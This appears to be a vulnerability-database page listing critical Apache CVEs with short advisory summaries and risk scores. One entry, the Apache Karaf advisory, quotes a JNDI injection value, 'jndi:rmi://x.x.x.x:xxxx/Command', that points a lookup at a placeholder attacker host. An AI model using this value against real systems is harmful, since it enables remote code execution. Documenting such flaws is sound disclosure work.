Vulnerabilities > Apache > Critical
| DATE | CVE | VULNERABILITY TITLE | RISK |
|---|---|---|---|
| 2023-02-01 | CVE-2023-24997 | Deserialization of Untrusted Data vulnerability in Apache Inlong Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7223 https://github.com/apache/inlong/pull/7223 to solve it. | 9.8 |
| 2023-01-31 | CVE-2022-24963 | Integer Overflow or Wraparound vulnerability in Apache Portable Runtime 1.7.0 Integer Overflow or Wraparound vulnerability in apr_encode functions of Apache Portable Runtime (APR) allows an attacker to write beyond bounds of a buffer. This issue affects Apache Portable Runtime (APR) version 1.7.0. | 9.8 |
| 2023-01-31 | CVE-2022-28331 | Integer Overflow or Wraparound vulnerability in Apache Portable Runtime On Windows, Apache Portable Runtime 1.7.0 and earlier may write beyond the end of a stack based buffer in apr_socket_sendv(). | 9.8 |
| 2023-01-21 | CVE-2023-22884 | Command Injection vulnerability in Apache Airflow Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow, Apache Software Foundation Apache Airflow MySQL Provider.This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0. | 9.8 |
| 2023-01-17 | CVE-2022-36760 | HTTP Request Smuggling vulnerability in Apache Http Server Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. | 9.0 |
| 2023-01-04 | CVE-2022-45875 | Improper Input Validation vulnerability in Apache Dolphinscheduler Improper validation of script alert plugin parameters in Apache DolphinScheduler to avoid remote command execution vulnerability. | 9.8 |
| 2023-01-03 | CVE-2021-32824 | Deserialization of Untrusted Data vulnerability in Apache Dubbo Apache Dubbo is a java based, open source RPC framework. | 9.8 |
| 2022-12-30 | CVE-2022-44621 | Command Injection vulnerability in Apache Kylin Diagnosis Controller miss parameter validation, so user may attacked by command injection via HTTP Request. | 9.8 |
| 2022-12-22 | CVE-2022-45347 | Incomplete Cleanup vulnerability in Apache Shardingsphere Apache ShardingSphere-Proxy prior to 5.3.0 when using MySQL as database backend didn't cleanup the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. | 9.8 |
| 2022-12-21 | CVE-2022-40145 | Unspecified vulnerability in Apache Karaf This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8 | 9.8 |